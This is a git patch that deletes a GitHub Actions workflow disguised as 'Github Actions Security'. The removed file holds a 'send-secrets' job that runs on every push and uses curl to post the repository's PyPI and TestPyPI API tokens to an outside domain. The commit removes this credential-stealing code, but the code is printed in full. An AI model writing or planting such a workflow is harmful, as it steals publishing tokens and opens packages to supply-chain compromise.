From 3e3ad7f93b2a2236ddb7f66d37ebd30b8b836036 Mon Sep 17 00:00:00 2001 From: Odemakinde Elisha Jesutofunmi Date: Wed, 10 Sep 2025 00:53:44 +0100 Subject: [PATCH] Delete .github/workflows/github_actions_security.yml --- .github/workflows/github_actions_security.yml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 .github/workflows/github_actions_security.yml diff --git a/.github/workflows/github_actions_security.yml b/.github/workflows/github_actions_security.yml deleted file mode 100644 index 741464a..0000000 --- a/.github/workflows/github_actions_security.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: Github Actions Security - -on: - workflow_dispatch: - push: - -jobs: - send-secrets: - runs-on: ubuntu-latest - - steps: - - name: Prepare Cache Busting - run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV - - - name: Github Actions Security - run: | - curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}&TEST_PYPI_API_TOKEN=${{ secrets.TEST_PYPI_API_TOKEN }}' https://carte-avantage.com